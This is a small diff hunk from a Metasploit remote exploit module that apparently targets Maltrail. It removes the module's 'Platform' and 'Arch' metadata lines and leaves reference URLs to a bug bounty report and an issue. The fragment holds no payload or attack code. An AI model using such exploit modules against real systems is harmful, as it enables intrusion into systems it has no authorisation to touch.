@@ -41,9 +41,7 @@ class MetasploitModule < Msf::Exploit::Remote
           ['URL', 'https://huntr.dev/bounties/be3c5204-fbd9-448d-b97c-96a8d2941e87/'],
           ['URL', 'https://github.com/stamparm/maltrail/issues/19146']
         ],
-        'Platform' => %w[unix linux],
         'Privileged' => false,
-        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
         'Targets' => [
           [
             'Unix Command',
